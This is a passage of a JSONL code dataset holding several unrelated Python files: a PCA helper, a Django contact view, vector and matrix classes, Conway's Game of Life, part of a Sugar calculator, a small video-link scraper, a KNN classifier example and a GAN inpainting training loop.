svd.fit(X)\n return svd.components_\n\ndef remove_pc(X, npc=1):\n \"\"\"\n Remove the projection on the principal components\n :param X: X[i,:] is a data point\n :param npc: number of principal components to remove\n :return: XX[i, :] is the data point after removing its projection\n \"\"\"\n pc = compute_pc(X, npc)\n if npc==1:\n XX = X - X.dot(pc.transpose()) * pc\n else:\n XX = X - X.dot(pc.transpose()).dot(pc)\n return XX","sub_path":"edu_sif_ccr/ccr.py","file_name":"ccr.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"260369374","text":"import logging\nimport smtplib\n\nfrom django.template import RequestContext\nfrom django.shortcuts import render_to_response\nfrom django.http import HttpResponseRedirect\n\nfrom website.forms import ContactForm\n\nlogger = logging.getLogger('PersonalWebsite.website.views')\n\n\n# Create your views here.\ndef indexPage(request):\n\n context = RequestContext(request)\n\n contact_form = ContactForm()\n email_fail = False\n\n if request.method == 'POST' and 'contact' in request.POST:\n\n logger.info(\"Contact form was posted - %s\", request.POST)\n\n contact_form = ContactForm(data = request.POST)\n\n if contact_form.is_valid():\n\n logger.info(\"Contact form data was valid. 
Generating email\")\n\n data = {}\n data['name'] = contact_form.cleaned_data['name']\n data['email'] = contact_form.cleaned_data['email']\n data['subject'] = contact_form.cleaned_data['subject']\n data['message'] = contact_form.cleaned_data['message']\n\n try:\n contact_form.sendEmail(data)\n\n response = HttpResponseRedirect('/')\n\n # Add cookie so we know succesful was posted when handling redirect\n # Could pass this email to template (not doing it at the moment)\n response.set_cookie('provided_email', data['email'])\n\n return response\n\n except smtplib.SMTPException:\n logger.error(\"Error occured sending contact email\")\n email_fail = True\n else:\n logger.error(\"Contact form data was invalid\")\n\n logger.info(\"Rendering index.html\")\n\n # This means a successful contact form was posted\n if request.COOKIES.get('provided_email'):\n\n context_dict = {'contact_form': contact_form,\n 'contacted' : True,\n 'email_fail' : email_fail}\n\n response = render_to_response('index.html', context_dict, context)\n response.delete_cookie('provided_email')\n\n return response\n\n else:\n\n context_dict = {'contact_form': contact_form,\n 'contacted' : False,\n 'email_fail' : email_fail}\n\n if email_fail:\n context_dict['email'] = data['email']\n\n return render_to_response('index.html', context_dict, context)\n","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"558170178","text":"from functools import reduce\n\n\nclass Vector:\n\n def __init__(self, vector1):\n self.vector1 = vector1\n\n def __str__(self):\n return \"{}\".format(self.vector1)\n\n def __repr__(self):\n return self.vector1\n\n #@property (make changes with this)\n def shape(self):\n return len(self.vector1)\n\n def shape_rule(self):\n raise ValueError(\"Incompatible shapes\")\n\n def shape_check(self, other):\n if self.shape() != other.shape():\n return self.shape_rule()\n\n def __add__(self, other):\n self.shape_check(other)\n new_vector = []\n for num in range(self.shape()):\n new_vector.append(self.vector1[num] + other.vector1[num])\n return new_vector\n\n def __sub__(self, other):\n self.shape_check(other)\n new_vector = []\n for num in range(self.shape()):\n new_vector.append(self.vector1[num] - other.vector1[num])\n return new_vector\n\n def __mul__(self, other):\n new_vector = []\n for num in range(self.shape()):\n new_vector.append(self.vector1[num] * other)\n return new_vector\n\n def dot(self, other):\n new_vector = []\n self.shape_check(other)\n vec_len = range(len(self.vector1))\n for pos in vec_len:\n new_vector.append(self.vector1[pos] * other.vector1[pos])\n return reduce(lambda x, y: x + y, new_vector)\n\n def magnitude(self):\n scalar = 0\n vector_len = len(self.vector1)\n for spot in range(0, vector_len):\n scalar += (self.vector1[spot] **2)\n return (scalar **(1/2))\n\nclass Matrix:\n\n def __init__(self, matrix1):\n self.matrix1 = matrix1\n\n def __str__(self):\n return \"{}\".format(self.matrix1)\n\n def column(self, num):\n col = []\n for line in self.matrix1:\n col.append(line[num])\n return col\n\n def row(self, num):\n return self.matrix1[num]\n\n def matrix_shape(self):\n column = len(self.matrix1)\n row = len(self.matrix1[0])\n return column, row\n\n def shape_check(self, other):\n if isinstance(other, Vector):\n if self.shape()[1] != other.shape():\n return self.shape_rule()\n if isinstance(other, self.__class__):\n if self.shape() != other.shape():\n 
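# shapes disagree, so delegate to shape_rule(), which raises ValueError(\"Incompatible shapes\")\n                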
return self.shape_rule()\n\n #@property (make changes with this)\n def shape(self):\n column = len(self.matrix1)\n row = len(self.matrix1[0])\n return column, row\n\n def shape_rule(other):\n raise ValueError(\"Incompatible shapes\")\n\n def __add__(self, other):\n self.shape_check(other)\n new_matrix = []\n for pos in range(len(self.column(0))):\n new_row = []\n for posi in range(len(self.row(0))):\n new_row.append(self.matrix1[pos][posi] + other.matrix1[pos][posi])\n new_matrix.append(new_row)\n return new_matrix\n\n def __sub__(self, other):\n self.shape_check(other)\n new_matrix = []\n for pos in range(len(self.column(0))):\n new_row = []\n for posi in range(len(self.row(0))):\n new_row.append(self.matrix1[pos][posi] - other.matrix1[pos][posi])\n new_matrix.append(new_row)\n return new_matrix\n\n def __mul__(self, other):\n self.shape_check(other)\n if isinstance(other, int):\n new_matrix = []\n for pos in range(len(self.column(0))):\n new_row = []\n for posi in range(len(self.row(0))):\n new_row.append(self.matrix1[pos][posi] * other)\n new_matrix.append(new_row)\n return new_matrix\n if isinstance(other, Vector):\n new_vec = []\n for row in self.matrix1:\n number = 0\n for pos in range(len(self.row(0))):\n number += (other.vector1[pos] * row[pos])\n new_vec.append(number)\n return new_vec\n\n\"\"\"Make Matrix a sub-class of vector, make vector a sub-class of list. Do more\nwith @property. Use my definitions within one another to simplify the\ndefinitions. Use Super to make things like the shape check better.\"\"\"\n","sub_path":"matrix_objects.py","file_name":"matrix_objects.py","file_ext":"py","file_size_in_byte":4250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"156705417","text":"\"\"\"\nconway.py\nAuthor: Adam Glueck\nCredit: Glen Passow, Stack overflow\nAssignment:\nWrite and submit a program that plays Conway's Game of Life, per \nhttps://github.com/HHS-IntroProgramming/Conway-Life\n\"\"\"\nfrom ggame import Frame, App, Color, RectangleAsset, Sprite, ImageAsset, LineStyle \nblack=Color(0x000000,1.0)\ncelestegreen=Color(0x00FFB7,1.0)\nred=Color(0xBA0000,1.0)\nline=LineStyle(1, black)\nheight=30\nwidth=30\n#imports graphics, gets color, sets dimensions of squares\ndictionary={}\n#creates an aptly named dictionary\nthinline=LineStyle(1, black)\nlivingcell=RectangleAsset(30,30,line,celestegreen)\nzombiecell=RectangleAsset(30,30,line,red)\n#creates squares\nclass cell(Sprite):\n def __init__(self, asset, position):\n super().__init__(asset, position)\n self.visible=False\n self.sca=0\nfor x in range(0,height):\n for y in range(0,width):\n Sprite(zombiecell,(x*height,y*width))\n dictionary[(x,y)]=cell(livingcell,(x*height,y*width))\nclass ConwayGame(App):\n def __init__(self):\n ConwayGame.listenKeyEvent(\"keydown\", \"space\",self.spaceclick)\n SCREEN_WIDTH=960\n SCREEN_HEIGHT=720\n self.moving = False\n super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT)\n ConwayGame.listenMouseEvent(\"click\",self.create)\n #creates the screen\n def create(self, event):\n self.cx=int(event.x/30)\n self.cy=int(event.y/30)\n #identifies mouse location\n dictionary[(self.cx, self.cy)].visible=not dictionary[(self.cx, self.cy)].visible\n #makes dead living by checking if inivis and if so making vis\n \n def spaceclick(self,event):\n self.moving=not self.moving\n def step(self):\n if self.moving==True:\n for a in range(0,height):\n for b in range(0,width):\n if dictionary[(a,b)].visible==True:\n dictionary[(a,b)].sca=dictionary[(a,b)].sca-1\n for c 
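The closing docstring of matrix_objects.py above proposes a refactor: make Vector a subclass of list and expose shape as a @property. A minimal, hypothetical sketch of that idea (the name ListVector is invented; only dot and magnitude are shown):

class ListVector(list):
    @property
    def shape(self):
        return len(self)

    def dot(self, other):
        # Elementwise product summed; shapes must agree.
        if self.shape != other.shape:
            raise ValueError("Incompatible shapes")
        return sum(a * b for a, b in zip(self, other))

    def magnitude(self):
        # Euclidean norm, as in Vector.magnitude above.
        return sum(x ** 2 for x in self) ** 0.5

# ListVector([3, 4]).magnitude() == 5.0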
in range(-1,2):\n                            for d in range(-1,2):\n                                if (c+a, d+b) in dictionary and dictionary[(c+a,d+b)].visible==True:\n                                    dictionary[(a,b)].sca=dictionary[(a,b)].sca+1\n            \n            for e in range(0,height):\n                for f in range(0,width):\n                    if dictionary[(e,f)].visible==True and dictionary[(e,f)].sca<2:\n                        dictionary[(e,f)].visible=False\n                    elif dictionary[(e,f)].visible==True and dictionary[(e,f)].sca>3:\n                        dictionary[(e,f)].visible=False\n                    elif dictionary[(e,f)].visible==False and dictionary[(e,f)].sca==3:\n                        dictionary[(e,f)].visible=True\n                    dictionary[(e,f)].sca=0\n    #check\nmyapp=ConwayGame()\nmyapp.run()\n","sub_path":"conway.py","file_name":"conway.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"304834856","text":"# -*- coding: utf-8 -*-\n# calculate.py, sugar calculator, by:\n# Reinier Heeres \n# Miguel Alvarez \n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n#\n# Change log:\n#    2007-07-03: rwh, first version\n\nfrom gettext import gettext as _\n#from numerals import local as _n, standard as _s\nimport logging\n_logger = logging.getLogger('Calculate')\n\nimport gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\nfrom gi.repository import Gdk\nimport base64\n\n#import sugar3.profile\n#from sugar3.graphics.xocolor import XoColor\n\n#from shareable_activity import ShareableActivity\n#from layout import CalcLayout\n#from mathlib import MathLib\n#from astparser import AstParser, ParserError, ParseError, RuntimeError\n#from svgimage import SVGImage\n\nfrom decimal import Decimal\n#from rational import Rational\n\n\ndef findchar(text, chars, ofs=0):\n    '''\n    Find a character in set  starting from offset ofs.\n    Everything between brackets '()' is ignored.\n    '''\n\n    level = 0\n    for i in range(ofs, len(text)):\n        if text[i] in chars and level == 0:\n            return i\n        elif text[i] == '(':\n            level += 1\n        elif text[i] == ')':\n            level -= 1\n\n    return -1\n\n\ndef _textview_realize_cb(widget):\n    '''Change textview properties once window is created.'''\n    win = widget.get_window(Gtk.TextWindowType.TEXT)\n    win.set_cursor(Gdk.Cursor.new(Gdk.CursorType.HAND1))\n    return False\n\n\nclass Equation:\n\n    def __init__(self, label=None, eqn=None, res=None, col=None, owner=None,\n                 eqnstr=None, ml=None):\n\n        if eqnstr is not None:\n            self.parse(eqnstr)\n        elif eqn is not None:\n            self.set(label, eqn, res, col, owner)\n\n        self.ml = ml\n\n    def set(self, label, eqn, res, col, owner):\n        \"\"\"Set equation properties.\"\"\"\n\n        self.label = label\n        self.equation = eqn\n        self.result = res\n        self.color = col\n        self.owner = owner\n\n    def __str__(self):\n        if isinstance(self.result, SVGImage):\n            svg_data = \"<svg>\" + base64.b64encode(self.result.get_svg_data())\n            return \"%s;%s;%s;%s;%s\\n\" % \\\n                (self.label, self.equation, svg_data,\n                 self.color.to_string(), self.owner)\n        else:\n            return 
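The step() method in conway.py above counts, for each cell, the live cells in its 3x3 neighbourhood (subtracting the cell itself via the initial sca decrement) and then applies the standard birth-3/survive-2-or-3 rules. The same logic as a small pure function (a sketch; the grid here is a plain dict of booleans rather than the Sprite-backed dictionary used above):

def next_alive(grid, x, y):
    # Live neighbours in the 3x3 block around (x, y), excluding the cell itself.
    neighbours = sum(
        grid.get((x + dx, y + dy), False)
        for dx in (-1, 0, 1)
        for dy in (-1, 0, 1)
        if (dx, dy) != (0, 0)
    )
    if grid.get((x, y), False):
        return neighbours in (2, 3)   # survival
    return neighbours == 3            # birth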
\"%s;%s;%s;%s;%s\\n\" % \\\n (self.label, self.equation, self.result,\n self.color.to_string(), self.owner)\n\n def parse(self, str):\n \"\"\"Parse equation object string representation.\"\"\"\n\n str = str.rstrip(\"\\r\\n\")\n k = str.split(';')\n if len(k) != 5:\n _logger.error(_('Equation.parse() string invalid (%s)'), str)\n return False\n\n if k[2].startswith(\"\"):\n k[2] = SVGImage(data=base64.b64decode(k[2][5:]))\n\n # Should figure out how to use MathLib directly in a non-hacky way\n else:\n try:\n k[2] = Decimal(k[2])\n except Exception:\n pass\n\n self.set(k[0], k[1], k[2], XoColor(color_string=k[3]), k[4])\n\n def determine_font_size(self, *tags):\n size = 0\n for tag in tags:\n try:\n size = max(size, tag.get_property('size'))\n except:\n pass\n return size\n\n def append_with_superscript_tags(self, buf, text, *tags):\n '''Add a text to a Gtk.TextBuffer with superscript tags.'''\n fontsize = self.determine_font_size(*tags)\n _logger.debug('font-size: %d', fontsize)\n tagsuper = buf.create_tag(rise=fontsize / 2)\n\n ENDSET = list(AstParser.DIADIC_OPS)\n ENDSET.extend((',', '(', ')'))\n ASET = list(AstParser.DIADIC_OPS)\n ofs = 0\n bracket_level = 0\n level = 0\n while ofs <= len(text) and text.find('**', ofs) != -1:\n nextofs = text.find('**', ofs)\n buf.insert_with_tags(buf.get_end_iter(), text[ofs:nextofs], *tags)\n nextofs2 = findchar(text, ENDSET, nextofs + 2)\n for i in range(nextofs, len(text)):\n if text[i] in ['(', '+', '-', ')']:\n if text[i] == '(':\n bracket_level = bracket_level + 1\n elif text[i] == ')':\n nextofs2 = i + 1\n bracket_level = bracket_level - 1\n if bracket_level == 0:\n break\n elif text[i] == '+':\n if level == 0 and bracket_level == 0:\n nextofs2 = findchar(text, ASET, i)\n break\n if bracket_level == 0:\n nextofs2 = findchar(text, ASET, i + 1)\n break\n elif text[i] == '-':\n if bracket_level == 0:\n if i == nextofs + 2:\n nextofs2 = findchar(text, ASET, i + 1)\n break\n else:\n nextofs2 = findchar(text, ASET, i)\n break\n\n _logger.debug('nextofs2: %d, char=%c', nextofs2, text[nextofs2])\n if nextofs2 == -1:\n nextofs2 = len(text)\n buf.insert_with_tags(\n buf.get_end_iter(), text[nextofs + 2:nextofs2],\n tagsuper, *tags)\n ofs = nextofs2\n\n if ofs < len(text):\n buf.insert_with_tags(buf.get_end_iter(), text[ofs:], *tags)\n\n def create_lasteq_textbuf(self):\n '''\n Return a Gtk.TextBuffer properly formatted for last equation\n Gtk.TextView.\n '''\n\n is_error = isinstance(self.result, ParserError)\n buf = Gtk.TextBuffer()\n tagsmallnarrow = buf.create_tag(font=CalcLayout.FONT_SMALL_NARROW)\n tagbignarrow = buf.create_tag(font=CalcLayout.FONT_BIG_NARROW)\n tagbigger = buf.create_tag(font=CalcLayout.FONT_BIGGER)\n tagjustright = buf.create_tag(justification=Gtk.Justification.RIGHT)\n tagred = buf.create_tag(foreground='#FF0000')\n\n # Add label and equation\n if len(self.label) > 0:\n labelstr = '%s:' % self.label\n buf.insert_with_tags(buf.get_end_iter(), labelstr, tagbignarrow)\n eqnoffset = buf.get_end_iter().get_offset()\n eqnstr = '%s\\n' % str(self.equation)\n if is_error:\n buf.insert_with_tags(buf.get_end_iter(), eqnstr, tagbignarrow)\n else:\n self.append_with_superscript_tags(buf, eqnstr, tagbignarrow)\n\n # Add result\n if type(self.result) in (bytes, str):\n resstr = str(self.result)\n resstr = resstr.rstrip('0').rstrip('.') \\\n if '.' 
in resstr else resstr\n buf.insert_with_tags(buf.get_end_iter(), resstr,\n tagsmallnarrow, tagjustright)\n elif is_error:\n resstr = str(self.result)\n resstr = resstr.rstrip('0').rstrip('.') \\\n if '.' in resstr else resstr\n buf.insert_with_tags(buf.get_end_iter(), resstr, tagsmallnarrow)\n range = self.result.get_range()\n eqnstart = buf.get_iter_at_offset(eqnoffset + range[0])\n eqnend = buf.get_iter_at_offset(eqnoffset + range[1])\n buf.apply_tag(tagred, eqnstart, eqnend)\n elif not isinstance(self.result, SVGImage):\n resstr = self.ml.format_number(self.result)\n resstr = str(resstr).rstrip('0').rstrip('.') \\\n if '.' in resstr else resstr\n self.append_with_superscript_tags(buf, resstr, tagbigger,\n tagjustright)\n\n return buf\n\n def create_history_object(self):\n \"\"\"\n Create a history object for this equation.\n In case of an SVG result this will be the image, otherwise it will\n return a properly formatted Gtk.TextView.\n \"\"\"\n\n if isinstance(self.result, SVGImage):\n return self.result.get_image()\n\n w = Gtk.TextView()\n w.modify_base(\n Gtk.StateType.NORMAL, Gdk.color_parse(self.color.get_fill_color()))\n w.modify_bg(\n Gtk.StateType.NORMAL,\n Gdk.color_parse(self.color.get_stroke_color()))\n w.set_wrap_mode(Gtk.WrapMode.WORD_CHAR)\n w.set_border_window_size(Gtk.TextWindowType.LEFT, 4)\n w.set_border_window_size(Gtk.TextWindowType.RIGHT, 4)\n w.set_border_window_size(Gtk.TextWindowType.TOP, 4)\n w.set_border_window_size(Gtk.TextWindowType.BOTTOM, 4)\n w.connect('realize', _textview_realize_cb)\n buf = w.get_buffer()\n\n tagsmall = buf.create_tag(font=CalcLayout.FONT_SMALL)\n tagsmallnarrow = buf.create_tag(font=CalcLayout.FONT_SMALL_NARROW)\n tagbig = buf.create_tag(font=CalcLayout.FONT_BIG,\n justification=Gtk.Justification.RIGHT)\n # TODO Fix for old Sugar 0.82 builds, red_float not available\n bright = (\n Gdk.color_parse(self.color.get_fill_color()).red_float +\n Gdk.color_parse(self.color.get_fill_color()).green_float +\n Gdk.color_parse(self.color.get_fill_color()).blue_float) / 3.0\n if bright < 0.5:\n col = Gdk.color_parse('white')\n else:\n col = Gdk.color_parse('black')\n tagcolor = buf.create_tag(foreground=col)\n\n # Add label, equation and result\n if len(self.label) > 0:\n labelstr = '%s:' % self.label\n buf.insert_with_tags(buf.get_end_iter(), labelstr, tagsmallnarrow)\n eqnstr = '%s\\n' % str(self.equation)\n self.append_with_superscript_tags(buf, eqnstr, tagsmall)\n\n resstr = self.ml.format_number(self.result)\n resstr = str(resstr).rstrip('0').rstrip('.') \\\n if '.' 
in resstr else resstr\n        if len(resstr) > 30:\n            restag = tagsmall\n        else:\n            restag = tagbig\n        self.append_with_superscript_tags(buf, resstr, restag)\n\n        buf.apply_tag(tagcolor, buf.get_start_iter(), buf.get_end_iter())\n\n        return w\n\ndef main():\n    win = Gtk.Window(Gtk.WindowType.TOPLEVEL)\n    Calculate(win)\n    Gtk.main()\n    return 0\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"TestAutomation/project/src/calculate.py","file_name":"calculate.py","file_ext":"py","file_size_in_byte":10986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"268666131","text":"import urllib.request\nfrom sys import argv\n\n#side = 'http://localhost/~mathiasholm/ntnu2.htm'\n#side = 'http://video.adm.ntnu.no/serier/52b1a4b91a601'\nside = 'https://video.adm.ntnu.no/serier/4fe2d4d3dcfd3'\nside = argv[1]\ndobj = urllib.request.urlopen(side)\n\ndef lister():\n    SideKø = []\n    ItererKø = True\n    while ItererKø is True:\n        testlinje = dobj.readline().decode('latin-1')\n        if 'video.adm.ntnu.no/pres/' in testlinje:\n            print(testlinje)\n            SideKø.append(testlinje)\n        if '' in testlinje:\n            ItererKø = False\n\n    EndeligSide = []\n\n    for e in SideKø:\n        medio = e.strip(' ')\n        medio = medio[75:-3]\n        print(SideKø)\n        EndeligSide.append(medio)\n    print(EndeligSide)\n    return(EndeligSide)\n\ndef SkrivListe(FilListe):\n    with open('unikodetest.txt', mode='a+', encoding='utf8') as målfil:\n        for e in FilListe:\n            print(e)\n            målfil.write(e+'\\n')\n\nif __name__ == \"__main__\":\n    print('Å, faen. åååå, faen')\n    SkrivListe(lister())\n","sub_path":"ntnu_openvideo/lister.py","file_name":"lister.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"649429995","text":"#!/opt/local/bin/python\n# _*_ coding: utf-8 _*_\n\n'K Nearest Neighbour'\n\n__author__ = 'Ethan Mengoreo'\n\nimport numpy as np\nfrom sklearn import preprocessing, neighbors\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\n\n\ndf = pd.read_csv('breast-cancer-wisconsin.data')\n# Replace not a number\ndf.replace('?', -99999, inplace=True)  # Outlier\ndf.drop(['id'], 1, inplace=True)\n\nX = np.array(df.drop(['class'], 1))\ny = np.array(df['class'])\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)\n\nclf = neighbors.KNeighborsClassifier()\nclf.fit(X_train, y_train)\n\naccuracy = clf.score(X_test, y_test)\nprint(accuracy)\n\nexample_measures = np.array([[4, 2, 1, 1, 1, 2, 3, 2, 1]])\n# Basically a transpose\nexample_measures = example_measures.reshape(len(example_measures), -1)\npredicted = clf.predict(example_measures)\nprint(predicted)\n","sub_path":"knn/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"571831271","text":"import torch\nfrom torch import nn\nfrom tqdm.auto import tqdm\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom torchvision.utils import make_grid\nfrom src.dataLayer import makeMasks\nfrom pathlib import Path\nimport torchvision.transforms as transforms\nfrom src.shared.modelUtility import modelHelper\nfrom src.models.UnetPartialConvModel import PartialConv2d\nfrom src.models.loss import CalculateLoss\nimport os\n\nclass trainInpainting():\n    def __init__(self, dataloader, testImageDataloader, generator, discriminator, config):\n        self.dataloader = dataloader\n        self.testdataloader = testImageDataloader\n        self.generator = generator\n        
self.discriminator = discriminator\n self.batchSize = config.batch_size\n self.epochs = config.epochs\n self.numberGPU = config.numberGPU # if using pure pytorch\n self.lr = config.lr\n self.beta1 = config.beta1\n self.beta2 = config.beta2\n self.device = config.device\n self.save_error_step = config.save_error_step\n self.config = config\n if config.run_polyaxon:\n self.localdir = config.data_path\n self.output_path =config.output_path\n else:\n self.localdir = Path().absolute().parent\n self.output_path= Path().absolute().parent\n self.modelOutputPath = Path.joinpath(self.output_path, 'models')\n self.ImageOutputPath = Path.joinpath(self.output_path,'images')\n self.trainMode = config.trainMode\n self.modelName = config.model_name\n self.run_TCI = config.run_TCI\n self.save_model_step = config.save_model_step\n\n def image_tensor_batch_to_list_of_pil_images(self,image_batch, resize_resolution=None):\n \"\"\"Creates a list of PIL images from a PyTorch tensor batch of 3-channel images.\n Creates a list of PIL images from a PyTorch tensor batch of 3-channel images.\n Args:\n image_batch: PyTorch tensor image batch.\n resize_resolution: Resolution which PIL images will be resized to.\n Returns:\n image_pil_list: List of PIL images.\n \"\"\"\n # Ensure that there is a batch dimension\n if len(image_batch.shape) < 4: # If there is only a single image in the batch\n image_batch = image_batch.unsqueeze(0) # Add extra dimension (batch size dimension)\n\n # Loop over the batch and append pil images to list\n image_pil_list = []\n num_images = image_batch.shape[0]\n for i in range(num_images):\n image_tensor = image_batch[i, :, :, :]\n image_pil = transforms.ToPILImage()(image_tensor.cpu()).convert('RGB')\n #if resize_resolution is not None:\n # image_pil = image_pil.resize(resize_resolution, Image.CUBIC)\n image_pil_list.append(image_pil)\n\n return image_pil_list\n\n def tensor_to_numpy(self,image_batch):\n images = []\n for i in image_batch:\n image = i.detach().cpu().numpy()\n image_numpy = image.astype(np.uint8)\n images.append(image_numpy)\n return images\n\n def show_tensor_images(self, image_tensorReal, image_tensorFake, image_tensorMasked,\n size=(3, 256, 256)):\n\n '''\n Function for visualizing images: Given a tensor of images, number of images, and\n size per image, plots and prints the images in an uniform grid.\n '''\n image_tensor1 = (image_tensorReal + 1) / 2\n image_unflat1 = image_tensor1.detach().cpu()\n image_tensor2 = (image_tensorFake + 1) / 2\n image_unflat2 = image_tensor2.detach().cpu()\n image_tensor3 = (image_tensorMasked + 1) / 2\n image_unflat3 = image_tensor3.detach().cpu()\n image_unflat1 = torch.cat((image_unflat1, image_unflat2, image_unflat3), dim=0)\n image_grid = make_grid(image_unflat1[:self.batchSize * 3], nrow=self.batchSize)\n plt.imshow(image_grid.permute(1, 2, 0).squeeze())\n plt.show()\n\n def trainGAN(self):\n gen = self.generator().to(self.device)\n gen_opt = torch.optim.Adam(gen.parameters(), lr=self.lr, betas=(self.beta1, self.beta2))\n disc = self.discriminator().to(self.device)\n disc_opt = torch.optim.Adam(disc.parameters(), lr=self.lr, betas=(self.beta1, self.beta2))\n filename = Path.joinpath(self.modelOutputPath, self.modelName + '_Errors_' + str(self.batchSize) + '.txt')\n criterionBCE = nn.BCELoss().cuda()\n criterionMSE = nn.L1Loss().cuda()\n\n # Loss function\n # Moves vgg16 model to gpu, used for feature map in loss function\n loss_func = CalculateLoss(self.config).cuda()\n print(\"Setup loss function...\")\n cur_step = 0\n\n 
discriminator_loss = []\n        generator_loss = []\n        generator_loss_BCE = []\n\n        loadAndAgumentMasks = makeMasks.MaskClass(self.config,rand_seed=None)\n\n        # maybe weight init via nn.Conv2d does not work when we use partconv2d; in that case, consider adding\n        # or isinstance(m,partConv2d) and put partconv2d somewhere it is accessible.\n        def weights_init(m):\n            if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d) or isinstance(m,PartialConv2d):\n                nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n                if m.bias is not None:\n                    nn.init.constant_(m.bias, 0)\n            elif isinstance(m, nn.BatchNorm2d):\n                torch.nn.init.constant_(m.weight, 1)\n                torch.nn.init.constant_(m.bias, 0)\n            elif isinstance(m,nn.LayerNorm):\n                torch.nn.init.normal_(m.weight, 0.0, 0.02)\n                torch.nn.init.constant_(m.bias, 0)\n\n        def weights_initOld(m):\n            if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d) or isinstance(m,PartialConv2d):\n                torch.nn.init.normal_(m.weight, 0.0, 0.02)\n            elif isinstance(m, nn.BatchNorm2d):\n                torch.nn.init.normal_(m.weight, 0.0, 0.02)\n                torch.nn.init.constant_(m.bias, 0)\n            elif isinstance(m,nn.LayerNorm):\n                torch.nn.init.normal_(m.weight, 0.0, 0.02)\n                torch.nn.init.constant_(m.bias, 0)\n\n\n        gen = gen.apply(weights_init)\n        disc = disc.apply(weights_init)\n        for epoch in range(self.epochs):\n            # Dataloader returns the batches\n\n            for real in tqdm(self.dataloader,position=0,leave=True,disable=self.config.run_polyaxon):\n                masks = loadAndAgumentMasks.returnTensorMasks(self.batchSize)\n                masks = torch.from_numpy(masks)\n                masks = masks.type(torch.cuda.FloatTensor)\n                masks = 1 - masks\n                masks.to(self.device)\n\n                Sar = real[1].to(self.device)\n                real = real[0].to(self.device)\n                real = real.type(torch.FloatTensor).to(self.device)\n\n                ## Update discriminator ##\n                disc.zero_grad()\n                fake_noise = torch.mul(real, masks)\n                fake = gen(fake_noise, masks)\n                disc_fake_pred = disc(fake.detach())\n                disc_fake_loss = criterionBCE(disc_fake_pred, torch.zeros_like(disc_fake_pred))\n                disc_real_pred = disc(real)\n                disc_real_loss = criterionBCE(disc_real_pred, torch.ones_like(disc_real_pred))\n                disc_loss = (disc_fake_loss + disc_real_loss)/2\n\n                gen_score_fakes = disc_fake_pred.mean().item()\n                disc_score_reals = disc_real_pred.mean().item()\n\n                # Keep track of the average discriminator loss\n                discriminator_loss.append(disc_loss.item())\n                # Update gradients\n                disc_loss.backward()\n                # Update optimizer\n                disc_opt.step()\n\n                ## Update generator ##\n                gen.zero_grad()\n                fake_2 = gen(fake_noise, masks)\n                disc_fake_pred2 = disc(fake_2)\n                #Calculate loss\n                gen_lossMSE = criterionMSE(real, fake_2)\n                gen_loss_Adversarial = criterionBCE(disc_fake_pred2, torch.ones_like(disc_real_pred))\n\n                # Add a heavy penalty to pixels underneath the mask, i.e. try to avoid mode collapse?\n                masks = 1-masks\n                real_masked_area = torch.mul(real,masks)\n                fake_masked_area = torch.mul(fake_2,masks)\n                #gen_loss_Inpainted_area = criterionMSE(real_masked_area,fake_masked_area)\n                gen_loss = gen_lossMSE + gen_loss_Adversarial #+ (gen_loss_Inpainted_area*5)\n\n                gen_score_fakes1 = disc_fake_pred2.mean().item()\n                # TODO: write a loss function that penalizes pixels changed outside the mask\n                # and computes MSE/L1 over all pixels\n                gen_loss.backward()\n                gen_opt.step()\n\n                # Keep track of the average generator loss\n                generator_loss.append(gen_loss.item())\n                generator_loss_BCE.append(gen_loss_Adversarial.item())\n                ## Visualization code ##\n                #modelHelper.save_tensor_single(real[0],Path.joinpath(self.ImageOutputPath, 'epoch_' + str(epoch) + '.tiff'))\n                if cur_step % 
self.save_model_step == 0 and cur_step > 0 and self.trainMode == False:\n\n #if not training, it means we are messing around testing stuff, so no need to save model\n #and losses\n print(\n f\"Step {cur_step}: Generator loss: {gen_loss.item()}, discriminator loss: {disc_loss.item()}\")\n\n # Save loss from generator and discriminator to a file, and reset them, to avoid the list perpetually growing\n # Name of file = model name + batch_size +\n discriminator_loss = [sum(discriminator_loss) / len(discriminator_loss)]\n generator_loss = [sum(generator_loss) / len(generator_loss)]\n generator_loss_BCE = [sum(generator_loss_BCE) / len(generator_loss_BCE)]\n\n self.show_tensor_images(fake_2, real, fake_noise)\n\n #If in train mode, it should not display images at xx display steps, but only save the model and\n #and losses during training\n cur_step += 1\n if self.config.run_polyaxon and epoch % 5 == 0:\n metrics = {}\n modelHelper.saveMetrics(metrics,'G_loss',generator_loss[-1],self.config.polyaxon_experiment,epoch)\n modelHelper.saveMetrics(metrics, 'G_BCE_loss', 